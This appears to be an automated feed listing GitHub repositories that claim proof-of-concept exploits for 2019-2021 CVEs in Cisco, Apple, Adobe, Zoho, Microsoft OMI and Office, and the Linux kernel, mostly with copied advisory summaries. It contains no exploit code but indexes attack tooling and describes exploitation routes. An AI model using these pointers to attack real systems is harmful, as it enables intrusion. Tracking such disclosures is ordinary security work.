**PoC for exploiting CVE-2020-3204 : A vulnerability in the Tool Command Language (Tcl) interpreter of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, local attacker with privileged EXEC credentials to execute arbitrary code on the underlying operating system (OS) with root privileges. The vulnerability is due to insufficient input validation of data passed to the Tcl interpreter. An attacker could exploit this vulnerability by loading malicious Tcl code on an affected device. A successful exploit could allow the attacker to cause memory corruption or execute the code with root privileges on the underlying OS of the affected device.** : [AlAIAL90/CVE-2020-3204](https://github.com/AlAIAL90/CVE-2020-3204) create time: 2021-09-18T02:46:14Z

**PoC for exploiting CVE-2020-3219 : A vulnerability in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker to inject and execute arbitrary commands with administrative privileges on the underlying operating system of an affected device. The vulnerability is due to insufficient validation of user-supplied input to the web UI. An attacker could exploit this vulnerability by submitting crafted input to the web UI. A successful exploit could allow an attacker to execute arbitrary commands with administrative privileges on an affected device.** : [AlAIAL90/CVE-2020-3219](https://github.com/AlAIAL90/CVE-2020-3219) create time: 2021-09-18T02:46:10Z

**PoC for exploiting CVE-2020-3206 : A vulnerability in the handling of IEEE 802.11w Protected Management Frames (PMFs) of Cisco Catalyst 9800 Series Wireless Controllers that are running Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to terminate a valid user connection to an affected device. The vulnerability exists because the affected software does not properly validate 802.11w disassociation and deauthentication PMFs that it receives. An attacker could exploit this vulnerability by sending a spoofed 802.11w PMF from a valid, authenticated client on a network adjacent to an affected device. A successful exploit could allow the attacker to terminate a single valid user connection to the affected device.** : [AlAIAL90/CVE-2020-3206](https://github.com/AlAIAL90/CVE-2020-3206) create time: 2021-09-18T02:46:06Z

**PoC for exploiting CVE-2020-3217 : A vulnerability in the Topology Discovery Service of Cisco One Platform Kit (onePK) in Cisco IOS Software, Cisco IOS XE Software, Cisco IOS XR Software, and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient length restrictions when the onePK Topology Discovery Service parses Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol message to an affected device. An exploit could allow the attacker to cause a stack overflow, which could allow the attacker to execute arbitrary code with administrative privileges, or to cause a process crash, which could result in a reload of the device and cause a DoS condition.** : [AlAIAL90/CVE-2020-3217](https://github.com/AlAIAL90/CVE-2020-3217) create time: 2021-09-18T02:46:02Z

**PoC for exploiting CVE-2020-3218 : A vulnerability in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker with administrative privileges to execute arbitrary code with root privileges on the underlying Linux shell. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by first creating a malicious file on the affected device itself and then uploading a second malicious file to the device. A successful exploit could allow the attacker to execute arbitrary code with root privileges or bypass licensing requirements on the device.** : [AlAIAL90/CVE-2020-3218](https://github.com/AlAIAL90/CVE-2020-3218) create time: 2021-09-18T02:45:58Z

**PoC for exploiting CVE-2020-3221 : A vulnerability in the Flexible NetFlow Version 9 packet processor of Cisco IOS XE Software for Cisco Catalyst 9800 Series Wireless Controllers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper validation of parameters in a Flexible NetFlow Version 9 record. An attacker could exploit this vulnerability by sending a malformed Flexible NetFlow Version 9 packet to the Control and Provisioning of Wireless Access Points (CAPWAP) data port of an affected device. An exploit could allow the attacker to trigger an infinite loop, resulting in a process crash that would cause a reload of the device.** : [AlAIAL90/CVE-2020-3221](https://github.com/AlAIAL90/CVE-2020-3221) create time: 2021-09-18T02:45:49Z

**PoC for exploiting CVE-2020-3225 : Multiple vulnerabilities in the implementation of the Common Industrial Protocol (CIP) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to insufficient input processing of CIP traffic. An attacker could exploit these vulnerabilities by sending crafted CIP traffic to be processed by an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.** : [AlAIAL90/CVE-2020-3225](https://github.com/AlAIAL90/CVE-2020-3225) create time: 2021-09-18T02:45:46Z

**PoC for exploiting CVE-2020-3226 : A vulnerability in the Session Initiation Protocol (SIP) library of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient sanity checks on received SIP messages. An attacker could exploit this vulnerability by sending crafted SIP messages to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service condition.** : [AlAIAL90/CVE-2020-3226](https://github.com/AlAIAL90/CVE-2020-3226) create time: 2021-09-18T02:45:42Z

**PoC for exploiting CVE-2020-3228 : A vulnerability in Security Group Tag Exchange Protocol (SXP) in Cisco IOS Software, Cisco IOS XE Software, and Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability exists because crafted SXP packets are mishandled. An attacker could exploit this vulnerability by sending specifically crafted SXP packets to the affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.** : [AlAIAL90/CVE-2020-3228](https://github.com/AlAIAL90/CVE-2020-3228) create time: 2021-09-18T02:45:38Z

**PoC for exploiting CVE-2020-3230 : A vulnerability in the Internet Key Exchange Version 2 (IKEv2) implementation in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to prevent IKEv2 from establishing new security associations. The vulnerability is due to incorrect handling of crafted IKEv2 SA-Init packets. An attacker could exploit this vulnerability by sending crafted IKEv2 SA-Init packets to the affected device. An exploit could allow the attacker to cause the affected device to reach the maximum incoming negotiation limits and prevent further IKEv2 security associations from being formed.** : [AlAIAL90/CVE-2020-3230](https://github.com/AlAIAL90/CVE-2020-3230) create time: 2021-09-18T02:45:34Z

**PoC for exploiting CVE-2020-3235 : A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software and Cisco IOS XE Software on Catalyst 4500 Series Switches could allow an authenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient input validation when the software processes specific SNMP object identifiers. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Note: To exploit this vulnerability by using SNMPv2c or earlier, the attacker must know the SNMP read-only community string for an affected system. To exploit this vulnerability by using SNMPv3, the attacker must know the user credentials for the affected system.** : [AlAIAL90/CVE-2020-3235](https://github.com/AlAIAL90/CVE-2020-3235) create time: 2021-09-18T02:45:30Z

**PoC for exploiting CVE-2020-3242 : A vulnerability in the REST API of Cisco UCS Director could allow an authenticated, remote attacker with administrative privileges to obtain confidential information from an affected device. The vulnerability exists because confidential information is returned as part of an API response. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to obtain the API key of another user, which would allow the attacker to impersonate the account of that user on the affected device. To exploit this vulnerability, the attacker must have administrative privileges on the device.** : [AlAIAL90/CVE-2020-3242](https://github.com/AlAIAL90/CVE-2020-3242) create time: 2021-09-18T02:45:28Z

**PoC for exploiting CVE-2020-3307 : A vulnerability in the web UI of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to write arbitrary entries to the log file on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send incorrect information to the system log on the affected system.** : [AlAIAL90/CVE-2020-3307](https://github.com/AlAIAL90/CVE-2020-3307) create time: 2021-09-18T02:45:24Z

**PoC for exploiting CVE-2020-3263 : A vulnerability in Cisco Webex Meetings Desktop App could allow an unauthenticated, remote attacker to execute programs on an affected end-user system. The vulnerability is due to improper validation of input that is supplied to application URLs. The attacker could exploit this vulnerability by persuading a user to follow a malicious URL. A successful exploit could allow the attacker to cause the application to execute other programs that are already present on the end-user system. If malicious files are planted on the system or on an accessible network file path, the attacker could execute arbitrary code on the affected system.** : [AlAIAL90/CVE-2020-3263](https://github.com/AlAIAL90/CVE-2020-3263) create time: 2021-09-18T02:45:20Z

**PoC for exploiting CVE-2020-3272 : A vulnerability in the DHCP server of Cisco Prime Network Registrar could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient input validation of incoming DHCP traffic. An attacker could exploit this vulnerability by sending a crafted DHCP request to an affected device. A successful exploit could allow the attacker to cause a restart of the DHCP server process, causing a DoS condition.** : [AlAIAL90/CVE-2020-3272](https://github.com/AlAIAL90/CVE-2020-3272) create time: 2021-09-18T02:45:18Z

**PoC for exploiting CVE-2020-3244 : A vulnerability in the Enhanced Charging Service (ECS) functionality of Cisco ASR 5000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to bypass the traffic classification rules on an affected device. The vulnerability is due to insufficient input validation of user traffic going through an affected device. An attacker could exploit this vulnerability by sending a malformed HTTP request to an affected device. A successful exploit could allow the attacker to bypass the traffic classification rules and potentially avoid being charged for traffic consumption.** : [AlAIAL90/CVE-2020-3244](https://github.com/AlAIAL90/CVE-2020-3244) create time: 2021-09-18T02:45:14Z

**PoC for exploiting CVE-2020-3283 : A vulnerability in the Secure Sockets Layer (SSL)/Transport Layer Security (TLS) handler of Cisco Firepower Threat Defense (FTD) Software when running on the Cisco Firepower 1000 Series platform could allow an unauthenticated, remote attacker to trigger a denial of service (DoS) condition on an affected device. The vulnerability is due to a communication error between internal functions. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message to an affected device. A successful exploit could allow the attacker to cause a buffer underrun, which leads to a crash. The crash causes the affected device to reload.** : [AlAIAL90/CVE-2020-3283](https://github.com/AlAIAL90/CVE-2020-3283) create time: 2021-09-18T02:45:10Z

**PoC for exploiting CVE-2020-3304 : A vulnerability in the web interface of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition. Note: This vulnerability applies to IP Version 4 (IPv4) and IP Version 6 (IPv6) HTTP traffic.** : [AlAIAL90/CVE-2020-3304](https://github.com/AlAIAL90/CVE-2020-3304) create time: 2021-09-18T02:45:06Z

**PoC for exploiting CVE-2020-3259 : A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. An attacker could exploit this vulnerability by sending a crafted GET request to the web services interface. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information. Note: This vulnerability affects only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.** : [AlAIAL90/CVE-2020-3259](https://github.com/AlAIAL90/CVE-2020-3259) create time: 2021-09-18T02:44:37Z

**PoC for exploiting CVE-2020-3214 : A vulnerability in Cisco IOS XE Software could allow an authenticated, local attacker to escalate their privileges to a user with root-level privileges. The vulnerability is due to insufficient validation of user-supplied content. This vulnerability could allow an attacker to load malicious software onto an affected device.** : [AlAIAL90/CVE-2020-3214](https://github.com/AlAIAL90/CVE-2020-3214) create time: 2021-09-18T02:44:33Z

**PoC for exploiting CVE-2020-5398 : In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input.** : [AlAIAL90/CVE-2020-5398](https://github.com/AlAIAL90/CVE-2020-5398) create time: 2021-09-18T02:43:51Z

**PoC for exploiting CVE-2021-30686 : An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted audio file may disclose restricted memory.** : [AlAIAL90/CVE-2021-30686](https://github.com/AlAIAL90/CVE-2021-30686) create time: 2021-09-18T02:48:13Z

**PoC for exploiting CVE-2021-30780 : An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-005 Mojave, Security Update 2021-004 Catalina. A malicious application may be able to gain root privileges.** : [AlAIAL90/CVE-2021-30780](https://github.com/AlAIAL90/CVE-2021-30780) create time: 2021-09-18T02:48:08Z

**PoC for exploiting CVE-2021-30779 : This issue was addressed with improved checks. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing a maliciously crafted image may lead to arbitrary code execution.** : [AlAIAL90/CVE-2021-30779](https://github.com/AlAIAL90/CVE-2021-30779) create time: 2021-09-18T02:48:05Z

**PoC for exploiting CVE-2021-30654 : This issue was addressed by removing additional entitlements. This issue is fixed in GarageBand 10.4.3. A local attacker may be able to read sensitive information.** : [AlAIAL90/CVE-2021-30654](https://github.com/AlAIAL90/CVE-2021-30654) create time: 2021-09-18T02:48:00Z

**PoC for exploiting CVE-2021-30773 : An issue in code signature validation was addressed with improved checks. This issue is fixed in iOS 14.7, tvOS 14.7, watchOS 7.6. A malicious application may be able to bypass code signing checks.** : [AlAIAL90/CVE-2021-30773](https://github.com/AlAIAL90/CVE-2021-30773) create time: 2021-09-18T02:47:56Z

**PoC for exploiting CVE-2021-30682 : A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information.** : [AlAIAL90/CVE-2021-30682](https://github.com/AlAIAL90/CVE-2021-30682) create time: 2021-09-18T02:47:52Z

**PoC for exploiting CVE-2021-30777 : An injection issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. A malicious application may be able to gain root privileges.** : [AlAIAL90/CVE-2021-30777](https://github.com/AlAIAL90/CVE-2021-30777) create time: 2021-09-18T02:47:48Z

**PoC for exploiting CVE-2021-30776 : A logic issue was addressed with improved validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-004 Catalina. Playing a malicious audio file may lead to an unexpected application termination.** : [AlAIAL90/CVE-2021-30776](https://github.com/AlAIAL90/CVE-2021-30776) create time: 2021-09-18T02:47:46Z

**PoC for exploiting CVE-2021-30768 : A logic issue was addressed with improved validation. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-004 Catalina. A sandboxed process may be able to circumvent sandbox restrictions.** : [AlAIAL90/CVE-2021-30768](https://github.com/AlAIAL90/CVE-2021-30768) create time: 2021-09-18T02:47:42Z

**PoC for exploiting CVE-2021-30781 : This issue was addressed with improved checks. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7, Security Update 2021-005 Mojave, Security Update 2021-004 Catalina. A local attacker may be able to cause unexpected application termination or arbitrary code execution.** : [AlAIAL90/CVE-2021-30781](https://github.com/AlAIAL90/CVE-2021-30781) create time: 2021-09-18T02:47:38Z

**PoC for exploiting CVE-2021-30684 : A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina. A remote attacker may cause an unexpected application termination or arbitrary code execution.** : [AlAIAL90/CVE-2021-30684](https://github.com/AlAIAL90/CVE-2021-30684) create time: 2021-09-18T02:47:35Z

**PoC for exploiting CVE-2021-1858 : Processing a maliciously crafted image may lead to arbitrary code execution. This issue is fixed in Security Update 2021-002 Catalina, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. An out-of-bounds write issue was addressed with improved bounds checking.** : [AlAIAL90/CVE-2021-1858](https://github.com/AlAIAL90/CVE-2021-1858) create time: 2021-09-18T02:47:31Z

**PoC for exploiting CVE-2021-30653 : This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing a maliciously crafted image may lead to arbitrary code execution.** : [AlAIAL90/CVE-2021-30653](https://github.com/AlAIAL90/CVE-2021-30653) create time: 2021-09-18T02:47:27Z

**PoC for exploiting CVE-2021-30689 : A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting.** : [AlAIAL90/CVE-2021-30689](https://github.com/AlAIAL90/CVE-2021-30689) create time: 2021-09-18T02:47:23Z

**PoC for exploiting CVE-2021-30695 : An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.** : [AlAIAL90/CVE-2021-30695](https://github.com/AlAIAL90/CVE-2021-30695) create time: 2021-09-18T02:47:19Z

**PoC for exploiting CVE-2021-30690 : Multiple issues in apache were addressed by updating apache to version 2.4.46. This issue is fixed in Security Update 2021-004 Mojave. Multiple issues in apache.** : [AlAIAL90/CVE-2021-30690](https://github.com/AlAIAL90/CVE-2021-30690) create time: 2021-09-18T02:47:15Z

**PoC for exploiting CVE-2021-30692 : An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.** : [AlAIAL90/CVE-2021-30692](https://github.com/AlAIAL90/CVE-2021-30692) create time: 2021-09-18T02:47:11Z

**PoC for exploiting CVE-2021-30671 : A validation issue was addressed with improved logic. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina. A malicious application may be able to send unauthorized Apple events to Finder.** : [AlAIAL90/CVE-2021-30671](https://github.com/AlAIAL90/CVE-2021-30671) create time: 2021-09-18T02:47:07Z

**PoC for exploiting CVE-2021-30694 : An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.** : [AlAIAL90/CVE-2021-30694](https://github.com/AlAIAL90/CVE-2021-30694) create time: 2021-09-18T02:47:04Z

**PoC for exploiting CVE-2021-37422 : Zoho ManageEngine ADSelfService Plus 6111 and prior is vulnerable to SQL Injection while linking the databases.** : [AlAIAL90/CVE-2021-37422](https://github.com/AlAIAL90/CVE-2021-37422) create time: 2021-09-18T02:46:59Z

**PoC for exploiting CVE-2021-37423 : Zoho ManageEngine ADSelfService Plus 6111 and prior is vulnerable to linked applications takeover.** : [AlAIAL90/CVE-2021-37423](https://github.com/AlAIAL90/CVE-2021-37423) create time: 2021-09-18T02:46:57Z

**PoC for exploiting CVE-2021-33909 : fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.** : [AlAIAL90/CVE-2021-33909](https://github.com/AlAIAL90/CVE-2021-33909) create time: 2021-09-18T02:46:37Z

**PoC for exploiting CVE-2021-37414 : Zoho ManageEngine DesktopCentral version 10.1.2119.7 and prior allows anyone to get a valid user's APIKEY without authentication.** : [AlAIAL90/CVE-2021-37414](https://github.com/AlAIAL90/CVE-2021-37414) create time: 2021-09-18T02:46:33Z

**PoC for exploiting CVE-2021-30691 : An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.** : [AlAIAL90/CVE-2021-30691](https://github.com/AlAIAL90/CVE-2021-30691) create time: 2021-09-18T02:46:29Z

**PoC for exploiting CVE-2021-30705 : This issue was addressed with improved checks. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted ASTC file may disclose memory contents.** : [AlAIAL90/CVE-2021-30705](https://github.com/AlAIAL90/CVE-2021-30705) create time: 2021-09-18T02:46:26Z

**PoC for exploiting CVE-2021-1885 : An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing a maliciously crafted image may lead to arbitrary code execution.** : [AlAIAL90/CVE-2021-1885](https://github.com/AlAIAL90/CVE-2021-1885) create time: 2021-09-18T02:46:22Z

**PoC for exploiting CVE-2021-30703 : A double free issue was addressed with improved memory management. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave, macOS Big Sur 11.4, watchOS 7.5. An application may be able to execute arbitrary code with kernel privileges.** : [AlAIAL90/CVE-2021-30703](https://github.com/AlAIAL90/CVE-2021-30703) create time: 2021-09-18T02:45:53Z

**PoC for exploiting CVE-2021-1881 : An out-of-bounds read was addressed with improved input validation. This issue is fixed in Security Update 2021-002 Catalina, Security Update 2021-003 Mojave, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. Processing a maliciously crafted font file may lead to arbitrary code execution.** : [AlAIAL90/CVE-2021-1881](https://github.com/AlAIAL90/CVE-2021-1881) create time: 2021-09-18T02:44:56Z

**PoC for exploiting CVE-2021-20117 : Nessus Agent 8.3.0 and earlier was found to contain a local privilege escalation vulnerability which could allow an authenticated, local administrator to run specific executables on the Nessus Agent host. This is different than CVE-2021-20118.** : [AlAIAL90/CVE-2021-20117](https://github.com/AlAIAL90/CVE-2021-20117) create time: 2021-09-18T02:44:52Z

**CVE-2021-40539 POC** : [DarkSprings/CVE-2021-40539](https://github.com/DarkSprings/CVE-2021-40539) create time: 2021-09-17T02:51:40Z

**Windows win32k ascension UAC poc** : [DarkSprings/CVE-2021-38639](https://github.com/DarkSprings/CVE-2021-38639) create time: 2021-09-17T02:09:37Z

**Exploitation of CVE-2019-5420 to gain code execution.** : [RyouYoo/CVE-2019-5420-RCE](https://github.com/RyouYoo/CVE-2019-5420-RCE) create time: 2021-09-16T23:44:14Z

**Python script to extract embedded URLs from doc files (.doc, .docx, .docm, .rtf)** : [gh0stxplt/CVE-2021-40444-URL-Extractor](https://github.com/gh0stxplt/CVE-2021-40444-URL-Extractor) create time: 2021-09-16T16:54:50Z

**A PoC exploit for CVE-2021-38647 RCE in OMI** : [Immersive-Labs-Sec/cve-2021-38647](https://github.com/Immersive-Labs-Sec/cve-2021-38647) create time: 2021-09-16T08:33:02Z

**no description** : [artsking/linux-4.1.15_CVE-2020-36386_withPatch](https://github.com/artsking/linux-4.1.15_CVE-2020-36386_withPatch) create time: 2021-09-16T10:41:08Z

**Proof on Concept Exploit for CVE-2021-38647 (OMIGOD)** : [horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647) create time: 2021-09-16T02:11:36Z

**CVE-2021-40444 - Custom CAB templates from MakeCAB** : [Udyz/CVE-2021-40444-CAB](https://github.com/Udyz/CVE-2021-40444-CAB) create time: 2021-09-16T10:14:08Z

**no description** : [artsking/linux-4.1.15_CVE-2021-33034_withPatch](https://github.com/artsking/linux-4.1.15_CVE-2021-33034_withPatch) create time: 2021-09-16T09:45:43Z

**CVE-2021-2456** : [peterjson31337/CVE-2021-2456](https://github.com/peterjson31337/CVE-2021-2456) create time: 2021-09-16T09:14:09Z

**no description** : [quynhle7821/CVE-2021-2302](https://github.com/quynhle7821/CVE-2021-2302) create time: 2021-09-16T08:27:30Z

**no description** : [Mochican/CVE-2021-21300](https://github.com/Mochican/CVE-2021-21300) create time: 2021-09-16T07:53:40Z

**CVE-2021-40444 - MS Office Word RCE Exploit** : [klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444) create time: 2021-09-15T22:34:35Z

**no description** : [artsking/linux-4.1.15_CVE-2020-36386_withPatch](https://github.com/artsking/linux-4.1.15_CVE-2020-36386_withPatch) create time: 2021-09-16T03:56:23Z

**no description** : [intrigueio/cve-2020-2853-poc](https://github.com/intrigueio/cve-2020-2853-poc) create time: 2021-09-13T17:27:02Z

**Import the Neo4j DBMS Dump File, in your Neo4j Database. This file is an example of how GraphKer works and consists of CVEs from 2021 (with related CPEs) and all CWEs and CAPECs.** : [amberzovitis/GraphKer-DBMS-Dump](https://github.com/amberzovitis/GraphKer-DBMS-Dump) create time: 2021-09-15T22:07:56Z

**CVE-2021-38647 POC for RCE** : [midoxnet/CVE-2021-38647](https://github.com/midoxnet/CVE-2021-38647) create time: 2021-09-15T21:44:30Z

**PoC for exploiting CVE-2021-1829 : A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.3. An application may be able to execute arbitrary code with kernel privileges.** : [AlAIAL90/CVE-2021-1829](https://github.com/AlAIAL90/CVE-2021-1829) create time: 2021-09-15T15:58:30Z

**PoC for exploiting CVE-2020-27942 : A logic issue was addressed with improved state management. This issue is fixed in Security Update 2021-002 Catalina, Security Update 2021-003 Mojave. Processing a maliciously crafted font file may lead to arbitrary code execution.** : [AlAIAL90/CVE-2020-27942](https://github.com/AlAIAL90/CVE-2020-27942) create time: 2021-09-15T15:58:26Z

**PoC for exploiting CVE-2021-1830 : An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 14.5 and iPadOS 14.5. A local user may be able to read kernel memory.** : [AlAIAL90/CVE-2021-1830](https://github.com/AlAIAL90/CVE-2021-1830) create time: 2021-09-15T15:58:22Z

**PoC for exploiting CVE-2021-30858 : A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.** : [AlAIAL90/CVE-2021-30858](https://github.com/AlAIAL90/CVE-2021-30858) create time: 2021-09-15T15:58:18Z

**PoC for exploiting CVE-2021-1831 : The issue was addressed with improved permissions logic. This issue is fixed in iOS 14.5 and iPadOS 14.5. An application may allow shortcuts to access restricted files.** : [AlAIAL90/CVE-2021-1831](https://github.com/AlAIAL90/CVE-2021-1831) create time: 2021-09-15T15:58:15Z

**PoC for exploiting CVE-2021-28560 : Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AlAIAL90/CVE-2021-28560](https://github.com/AlAIAL90/CVE-2021-28560) create time: 2021-09-15T15:58:11Z

**PoC for exploiting CVE-2021-28564 : Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by an Out-of-bounds Write vulnerability within the ImageTool component. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AlAIAL90/CVE-2021-28564](https://github.com/AlAIAL90/CVE-2021-28564) create time: 2021-09-15T15:58:07Z

**PoC for exploiting CVE-2021-28561 : Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a memory corruption vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AlAIAL90/CVE-2021-28561](https://github.com/AlAIAL90/CVE-2021-28561) create time: 2021-09-15T15:58:03Z

**PoC for exploiting CVE-2021-28565 : Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by an Out-of-bounds Read vulnerability in the PDFLibTool component. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AlAIAL90/CVE-2021-28565](https://github.com/AlAIAL90/CVE-2021-28565) create time: 2021-09-15T15:57:58Z

**PoC for exploiting CVE-2021-28559 : Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by an Information Exposure vulnerability. An unauthenticated attacker could leverage this vulnerability to get access to restricted data stored within global variables and objects.** : [AlAIAL90/CVE-2021-28559](https://github.com/AlAIAL90/CVE-2021-28559) create time: 2021-09-15T15:57:54Z

**PoC for exploiting CVE-2021-1833 : This issue was addressed with improved checks. This issue is fixed in iOS 14.5 and iPadOS 14.5. An application may be able to gain elevated privileges.** : [AlAIAL90/CVE-2021-1833](https://github.com/AlAIAL90/CVE-2021-1833) create time: 2021-09-15T15:57:51Z

**PoC for exploiting CVE-2021-1832 : Copied files may not have the expected file permissions. This issue is fixed in Security Update 2021-002 Catalina, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. The issue was addressed with improved permissions logic.** : [AlAIAL90/CVE-2021-1832](https://github.com/AlAIAL90/CVE-2021-1832) create time: 2021-09-15T15:57:48Z

